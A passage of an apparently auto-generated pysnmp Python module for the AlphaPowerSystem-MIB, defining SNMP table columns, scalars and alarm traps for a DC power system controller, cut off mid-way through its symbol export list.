dcPwrSysCntrlrIpIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 2, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCntrlrIpIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCntrlrIpIntegerValue.setDescription('The integer value of the controller input variable as reported by the controller input group.')
dcPwrSysCntrlrIpStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 2, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCntrlrIpStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCntrlrIpStringValue.setDescription('The string value of the controller input variable as reported by the controller input group.')
dcPwrSysRectIpCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 3, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRectIpCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRectIpCount.setDescription('Number of rectifier input variables in system controller rectifier input table.')
dcPwrSysRectIpTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 3, 2), )
if mibBuilder.loadTexts: dcPwrSysRectIpTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRectIpTable.setDescription('A table of rectifier input variables.')
dcPwrSysRectIpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 3, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysRectIpIndex"))
if mibBuilder.loadTexts: dcPwrSysRectIpEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRectIpEntry.setDescription('An entry into the rectifier input group.')
dcPwrSysRectIpIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 3, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRectIpIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRectIpIndex.setDescription('The index of the rectifier input variable in the table rectifier input group.')
dcPwrSysRectIpName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 3, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRectIpName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRectIpName.setDescription('The description of the rectifier input variable as reported by the rectifier input group.')
dcPwrSysRectIpIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 3, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRectIpIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRectIpIntegerValue.setDescription('The integer value of the rectifier input variable as reported by the rectifier input group.')
dcPwrSysRectIpStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 3, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRectIpStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRectIpStringValue.setDescription('The string value of the rectifier input variable as reported by the rectifier input group.')
dcPwrSysCustomIpCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 4, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCustomIpCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCustomIpCount.setDescription('Number of custom input variables in system controller custom input table.')
dcPwrSysCustomIpTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 4, 2), )
if mibBuilder.loadTexts: dcPwrSysCustomIpTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCustomIpTable.setDescription('A table of digital custom variables.')
dcPwrSysCustomIpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 4, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysCustomIpIndex"))
if mibBuilder.loadTexts: dcPwrSysCustomIpEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCustomIpEntry.setDescription('An entry into the custom input group.')
dcPwrSysCustomIpIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 4, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCustomIpIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCustomIpIndex.setDescription('The index of the custom input variable in the table custom input group.')
dcPwrSysCustomIpName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 4, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCustomIpName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCustomIpName.setDescription('The description of the custom input variable as reported by the custom input group.')
dcPwrSysgCustomIpIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 4, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: dcPwrSysgCustomIpIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysgCustomIpIntegerValue.setDescription('The integer value of the custom input variable as reported by the custom input group.')
dcPwrSysCustomIpStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 4, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCustomIpStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCustomIpStringValue.setDescription('The string value of the custom input variable as reported by the custom input group.')
dcPwrSysConvIpCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 5, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysConvIpCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysConvIpCount.setDescription('Number of Converter input variables in system controller Converter input table.')
dcPwrSysConvIpTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 5, 2), )
if mibBuilder.loadTexts: dcPwrSysConvIpTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysConvIpTable.setDescription('A table of Converter input variables.')
dcPwrSysConvIpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 5, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysConvIpIndex"))
if mibBuilder.loadTexts: dcPwrSysConvIpEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysConvIpEntry.setDescription('An entry into the Converter input group.')
dcPwrSysConvIpIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 5, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysConvIpIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysConvIpIndex.setDescription('The index of the Converter input variable in the table Converter input group.')
dcPwrSysConvIpName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 5, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysConvIpName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysConvIpName.setDescription('The description of the Converter input variable as reported by the Converter input group.')
dcPwrSysConvIpIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 5, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysConvIpIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysConvIpIntegerValue.setDescription('The integer value of the Converter input variable as reported by the Converter input group.')
dcPwrSysConvIpStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 5, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysConvIpStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysConvIpStringValue.setDescription('The string value of the Converter input variable as reported by the Converter input group.')
dcPwrSysTimerIpCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 6, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysTimerIpCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysTimerIpCount.setDescription('Number of Timer input variables in system controller Timer input table.')
dcPwrSysTimerIpTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 6, 2), )
if mibBuilder.loadTexts: dcPwrSysTimerIpTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysTimerIpTable.setDescription('A table of Timer input variables')
dcPwrSysTimerIpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 6, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysTimerIpIndex"))
if mibBuilder.loadTexts: dcPwrSysTimerIpEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysTimerIpEntry.setDescription('An entry into the Timer input group')
dcPwrSysTimerIpIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 6, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysTimerIpIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysTimerIpIndex.setDescription('The index of the Timer input variable in the table Timer input group.')
dcPwrSysTimerIpName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 6, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysTimerIpName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysTimerIpName.setDescription('The description of the Timer input variable as reported by the Timer input group.')
dcPwrSysTimerIpIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 6, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysTimerIpIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysTimerIpIntegerValue.setDescription('The integer value of the Timer input variable as reported by the Timer input group.')
dcPwrSysTimerIpStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 6, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysTimerIpStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysTimerIpStringValue.setDescription('The string value of the Timer input variable as reported by the Timer input group.')
dcPwrSysCounterIpCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 7, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCounterIpCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCounterIpCount.setDescription('Number of Counter input variables in system controller Counter input table.')
dcPwrSysCounterIpTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 7, 2), )
if mibBuilder.loadTexts: dcPwrSysCounterIpTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCounterIpTable.setDescription('A table of Counter input variables.')
dcPwrSysCounterIpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 7, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysCounterIpIndex"))
if mibBuilder.loadTexts: dcPwrSysCounterIpEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCounterIpEntry.setDescription('An entry into the Counter input group.')
dcPwrSysCounterIpIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 7, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCounterIpIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCounterIpIndex.setDescription('The index of the Counter input variable in the table Counter input group.')
dcPwrSysCounterIpName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 7, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCounterIpName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCounterIpName.setDescription('The description of the Counter input variable as reported by the Counter input group.')
dcPwrSysCounterIpIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 7, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCounterIpIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCounterIpIntegerValue.setDescription('The integer value of the Counter input variable as reported by the Counter input group.')
dcPwrSysCounterIpStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 7, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCounterIpStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCounterIpStringValue.setDescription('The string value of the Counter input variable as reported by the Counter input group.')
dcPwrSysTrap = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 3, 0))
dcPwrSysAlarmActiveTrap = NotificationType((1, 3, 6, 1, 4, 1, 7309, 4, 1, 3, 0, 1)).setObjects(("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmStringValue"), ("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmIndex"), ("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmSeverity"), ("AlphaPowerSystem-MIB", "dcPwrSysSiteName"), ("AlphaPowerSystem-MIB", "dcPwrSysTimeStamp"), ("AlphaPowerSystem-MIB", "dcPwrSysAlarmTriggerValue"))
if mibBuilder.loadTexts: dcPwrSysAlarmActiveTrap.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAlarmActiveTrap.setDescription('A trap issued when one of the alarms on the became active.')
dcPwrSysAlarmClearedTrap = NotificationType((1, 3, 6, 1, 4, 1, 7309, 4, 1, 3, 0, 2)).setObjects(("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmStringValue"), ("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmIndex"), ("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmSeverity"), ("AlphaPowerSystem-MIB", "dcPwrSysSiteName"), ("AlphaPowerSystem-MIB", "dcPwrSysAlarmTriggerValue"))
if mibBuilder.loadTexts: dcPwrSysAlarmClearedTrap.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAlarmClearedTrap.setDescription('A trap issued when one of the active alarms on the is cleared.')
dcPwrSysRelayTrap = NotificationType((1, 3, 6, 1, 4, 1, 7309, 4, 1, 3, 0, 3)).setObjects(("AlphaPowerSystem-MIB", "dcPwrSysRelayIntegerValue"), ("AlphaPowerSystem-MIB", "dcPwrSysRelayStringValue"), ("AlphaPowerSystem-MIB", "dcPwrSysRelayIndex"), ("AlphaPowerSystem-MIB", "dcPwrSysRelaySeverity"), ("AlphaPowerSystem-MIB", "dcPwrSysSiteName"))
if mibBuilder.loadTexts: dcPwrSysRelayTrap.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRelayTrap.setDescription('A trap issued from a change in state in one of the relays on the DC power system controller.')
dcPwrSysComOKTrap = NotificationType((1, 3, 6, 1, 4, 1, 7309, 4, 1, 3, 0, 4)).setObjects(("AlphaPowerSystem-MIB", "dcPwrSysSiteName"))
if mibBuilder.loadTexts: dcPwrSysComOKTrap.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysComOKTrap.setDescription('A trap to indicate that communications with a DC power system controller has been established.')
dcPwrSysComErrTrap = NotificationType((1, 3, 6, 1, 4, 1, 7309, 4, 1, 3, 0, 5)).setObjects(("AlphaPowerSystem-MIB", "dcPwrSysSiteName"))
if mibBuilder.loadTexts: dcPwrSysComErrTrap.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysComErrTrap.setDescription('A trap to indicate that communications with a DC power system controller has been lost.')
dcPwrSysAgentStartupTrap = NotificationType((1, 3, 6, 1, 4, 1, 7309, 4, 1, 3, 0, 6)).setObjects(("AlphaPowerSystem-MIB", "dcPwrSysSiteName"))
if mibBuilder.loadTexts: dcPwrSysAgentStartupTrap.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAgentStartupTrap.setDescription('A trap to indicate that the agent software has started up.')
dcPwrSysAgentShutdownTrap = NotificationType((1, 3, 6, 1, 4, 1, 7309, 4, 1, 3, 0, 7)).setObjects(("AlphaPowerSystem-MIB", "dcPwrSysSiteName"))
if mibBuilder.loadTexts: dcPwrSysAgentShutdownTrap.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAgentShutdownTrap.setDescription('A trap to indicate that the agent software has shutdown.')
dcPwrSysMajorAlarmActiveTrap = NotificationType((1, 3, 6, 1, 4, 1, 7309, 4, 1, 3, 0, 8)).setObjects(("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmStringValue"), ("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmIndex"), ("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmSeverity"), ("AlphaPowerSystem-MIB", "dcPwrSysSiteName"))
if mibBuilder.loadTexts: dcPwrSysMajorAlarmActiveTrap.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysMajorAlarmActiveTrap.setDescription('A trap issued as a summary of DC power system status. It is sent when the system goes into in Major Alarm')
dcPwrSysMajorAlarmClearedTrap = NotificationType((1, 3, 6, 1, 4, 1, 7309, 4, 1, 3, 0, 9)).setObjects(("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmStringValue"), ("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmIndex"), ("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmSeverity"), ("AlphaPowerSystem-MIB", "dcPwrSysSiteName"))
if mibBuilder.loadTexts: dcPwrSysMajorAlarmClearedTrap.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysMajorAlarmClearedTrap.setDescription('A trap issued as a summary of DC power system status. It is sent when the system comes out of Major Alarm')
dcPwrSysMinorAlarmActiveTrap = NotificationType((1, 3, 6, 1, 4, 1, 7309, 4, 1, 3, 0, 10)).setObjects(("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmStringValue"), ("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmIndex"), ("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmSeverity"), ("AlphaPowerSystem-MIB", "dcPwrSysSiteName"))
if mibBuilder.loadTexts: dcPwrSysMinorAlarmActiveTrap.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysMinorAlarmActiveTrap.setDescription('A trap issued as a summary of DC power system status. It is sent when the system goes into in Minor Alarm')
dcPwrSysMinorAlarmClearedTrap = NotificationType((1, 3, 6, 1, 4, 1, 7309, 4, 1, 3, 0, 11)).setObjects(("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmStringValue"), ("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmIndex"), ("AlphaPowerSystem-MIB", "dcPwrSysRectAlrmSeverity"), ("AlphaPowerSystem-MIB", "dcPwrSysSiteName"))
if mibBuilder.loadTexts: dcPwrSysMinorAlarmClearedTrap.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysMinorAlarmClearedTrap.setDescription('A trap issued as a summary of DC power system status. It is sent when the system comes out of Minor Alarm')
dcPwrSysResyncAlarms = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 8, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: dcPwrSysResyncAlarms.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysResyncAlarms.setDescription('Send/Resend all active alarms that were previously sent through SNMP notification.')
dcPwrSysAlarmTriggerValue = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 9, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysAlarmTriggerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAlarmTriggerValue.setDescription('')
dcPwrSysTimeStamp = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 9, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysTimeStamp.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysTimeStamp.setDescription('')
mibBuilder.exportSymbols("AlphaPowerSystem-MIB", dcPwrSysAnalogOpTable=dcPwrSysAnalogOpTable, dcPwrSysDigAlrmStringValue=dcPwrSysDigAlrmStringValue, dcPwrSysCntrlrIpTable=dcPwrSysCntrlrIpTable, dcPwrSysDigAlrmCount=dcPwrSysDigAlrmCount, dcPwrSysAdioAlrmEntry=dcPwrSysAdioAlrmEntry, dcPwrSysTempAlrmTbl=dcPwrSysTempAlrmTbl, dcPwrSysMiscAlrmName=dcPwrSysMiscAlrmName, dcPwrSysConvAlrmStringValue=dcPwrSysConvAlrmStringValue, dcPwrSysSiteRegion=dcPwrSysSiteRegion, dcPwrSysRelayTable=dcPwrSysRelayTable, dcPwrSysTempAlrmIntegerValue=dcPwrSysTempAlrmIntegerValue, dcPwrSysCustomAlrmIntegerValue=dcPwrSysCustomAlrmIntegerValue, dcPwrSysVariable=dcPwrSysVariable, dcPwrSysCtrlAlrmCount=dcPwrSysCtrlAlrmCount, dcPwrSysRectAlrmSeverity=dcPwrSysRectAlrmSeverity, dcPwrSysResyncAlarms=dcPwrSysResyncAlarms, dcPwrSysRelayIndex=dcPwrSysRelayIndex, dcPwrSysMiscAlrmStringValue=dcPwrSysMiscAlrmStringValue, PYSNMP_MODULE_ID=alpha, dcPwrSysCustomAlrmEntry=dcPwrSysCustomAlrmEntry, dcPwrSysCntrlrIpTbl=dcPwrSysCntrlrIpTbl, dcPwrSysSoftwareVersion=dcPwrSysSoftwareVersion, dcPwrSysInvAlrmIntegerValue=dcPwrSysInvAlrmIntegerValue, dcPwrExternalControls=dcPwrExternalControls, dcPwrSysSystemNumber=dcPwrSysSystemNumber, dcPwrSysSiteNumber=dcPwrSysSiteNumber, dcPwrSysMajorAlarmClearedTrap=dcPwrSysMajorAlarmClearedTrap, dcPwrSysCtrlAlrmSeverity=dcPwrSysCtrlAlrmSeverity, dcPwrSysChargeAmps=dcPwrSysChargeAmps, dcPwrSysDigAlrmEntry=dcPwrSysDigAlrmEntry, dcPwrSysConvIpCount=dcPwrSysConvIpCount, dcPwrSysVoltAlrmIndex=dcPwrSysVoltAlrmIndex, dcPwrSysTempAlrmEntry=dcPwrSysTempAlrmEntry, dcPwrSysConvIpIndex=dcPwrSysConvIpIndex, dcPwrSysSystemSerial=dcPwrSysSystemSerial, dcPwrSysDischargeAmps=dcPwrSysDischargeAmps, dcPwrSysString=dcPwrSysString, dcPwrSysRectAlrmTable=dcPwrSysRectAlrmTable, dcPwrSysCustomAlrmName=dcPwrSysCustomAlrmName, dcPwrSysAgentShutdownTrap=dcPwrSysAgentShutdownTrap, dcPwrSysBattAlrmStringValue=dcPwrSysBattAlrmStringValue, dcPwrSysInvAlrmIndex=dcPwrSysInvAlrmIndex, dcPwrSysCounterIpCount=dcPwrSysCounterIpCount, dcPwrSysTimerIpIntegerValue=dcPwrSysTimerIpIntegerValue, dcPwrSysRelayTrap=dcPwrSysRelayTrap, dcPwrSysCustomAlrmIndex=dcPwrSysCustomAlrmIndex, dcPwrSysMiscAlrmSeverity=dcPwrSysMiscAlrmSeverity, dcPwrSysCounterIpTable=dcPwrSysCounterIpTable, dcPwrSysMiscAlrmIndex=dcPwrSysMiscAlrmIndex, dcPwrSysCounterIpEntry=dcPwrSysCounterIpEntry, dcPwrSysComOKTrap=dcPwrSysComOKTrap, dcPwrSysAnalogOpIndex=dcPwrSysAnalogOpIndex, dcPwrSysDigAlrmTable=dcPwrSysDigAlrmTable, dcPwrSysDigAlrmIndex=dcPwrSysDigAlrmIndex, dcPwrSysSiteCountry=dcPwrSysSiteCountry, dcPwrSysCurrAlrmStringValue=dcPwrSysCurrAlrmStringValue, dcPwrSysAdioAlrmIndex=dcPwrSysAdioAlrmIndex, dcPwrSysCustomIpTable=dcPwrSysCustomIpTable, dcPwrSysTimerIpName=dcPwrSysTimerIpName, dcPwrSysTimerIpStringValue=dcPwrSysTimerIpStringValue, dcPwrSysVoltAlrmIntegerValue=dcPwrSysVoltAlrmIntegerValue, dcPwrSysBattAlrmName=dcPwrSysBattAlrmName, dcPwrSysAdioAlrmSeverity=dcPwrSysAdioAlrmSeverity, dcPwrSysCntrlrIpStringValue=dcPwrSysCntrlrIpStringValue, dcPwrSysConvAlrmTbl=dcPwrSysConvAlrmTbl, dcPwrSysConvIpName=dcPwrSysConvIpName, dcPwrSysCntrlrIpCount=dcPwrSysCntrlrIpCount, dcPwrSysRectIpEntry=dcPwrSysRectIpEntry, dcPwrSysInvAlrmTable=dcPwrSysInvAlrmTable, dcPwrSysTimerIpIndex=dcPwrSysTimerIpIndex, dcPwrSysCounterIpIntegerValue=dcPwrSysCounterIpIntegerValue, dcPwrSysRectAlrmIntegerValue=dcPwrSysRectAlrmIntegerValue, dcPwrSysTempAlrmSeverity=dcPwrSysTempAlrmSeverity, dcPwrSysDigIpTbl=dcPwrSysDigIpTbl, dcPwrSysCtrlAlrmIndex=dcPwrSysCtrlAlrmIndex, dcPwrSysCntrlrIpName=dcPwrSysCntrlrIpName, dcPwrSysCustomIpCount=dcPwrSysCustomIpCount, dcPwrSysAlarmActiveTrap=dcPwrSysAlarmActiveTrap, dcPwrSysMinorAlarmClearedTrap=dcPwrSysMinorAlarmClearedTrap, dcPwrSysOutputsTbl=dcPwrSysOutputsTbl, dcPwrSysConvAlrmName=dcPwrSysConvAlrmName, dcPwrSysRectAlrmStringValue=dcPwrSysRectAlrmStringValue, dcPwrSysDigIpCount=dcPwrSysDigIpCount, dcPwrSysRectAlrmTbl=dcPwrSysRectAlrmTbl, dcPwrSysChargeVolts=dcPwrSysChargeVolts, dcPwrSysTrap=dcPwrSysTrap, dcPwrSysDigAlrmIntegerValue=dcPwrSysDigAlrmIntegerValue, dcPwrSysConvIpTbl=dcPwrSysConvIpTbl, dcPwrSysDigIpIndex=dcPwrSysDigIpIndex, dcPwrSysgCustomIpIntegerValue=dcPwrSysgCustomIpIntegerValue, dcPwrSysAdioAlrmName=dcPwrSysAdioAlrmName, dcPwrSysComErrTrap=dcPwrSysComErrTrap, dcPwrSysConvAlrmIndex=dcPwrSysConvAlrmIndex, dcPwrSysTempAlrmStringValue=dcPwrSysTempAlrmStringValue, dcPwrSysCntrlrIpIntegerValue=dcPwrSysCntrlrIpIntegerValue, dcPwrSysRectIpTable=dcPwrSysRectIpTable, dcPwrSysDigAlrmName=dcPwrSysDigAlrmName, dcPwrSysConvIpTable=dcPwrSysConvIpTable, dcPwrSysMiscAlrmEntry=dcPwrSysMiscAlrmEntry, dcPwrSysDevice=dcPwrSysDevice, dcPwrSysVoltAlrmStringValue=dcPwrSysVoltAlrmStringValue, dcPwrSysRectAlrmName=dcPwrSysRectAlrmName, dcPwrSysTimerIpEntry=dcPwrSysTimerIpEntry, dcPwrSysSystemType=dcPwrSysSystemType, dcPwrSysCtrlAlrmTable=dcPwrSysCtrlAlrmTable, dcPwrSysConvIpEntry=dcPwrSysConvIpEntry, dcPwrSysSiteCity=dcPwrSysSiteCity, dcPwrSysAnalogOpIntegerValue=dcPwrSysAnalogOpIntegerValue, dcPwrSysCtrlAlrmStringValue=dcPwrSysCtrlAlrmStringValue, dcPwrSysAnalogOpSeverity=dcPwrSysAnalogOpSeverity, dcPwrSysInvAlrmStringValue=dcPwrSysInvAlrmStringValue, dcPwrSysInvAlrmTbl=dcPwrSysInvAlrmTbl, dcPwrSysRectIpCount=dcPwrSysRectIpCount, dcPwrSysConvIpIntegerValue=dcPwrSysConvIpIntegerValue, dcPwrSysVoltAlrmCount=dcPwrSysVoltAlrmCount, dcPwrSysRectIpIndex=dcPwrSysRectIpIndex, dcPwrSysRectIpName=dcPwrSysRectIpName, dcPwrSysDigIpStringValue=dcPwrSysDigIpStringValue, dcPwrSysRectIpIntegerValue=dcPwrSysRectIpIntegerValue, 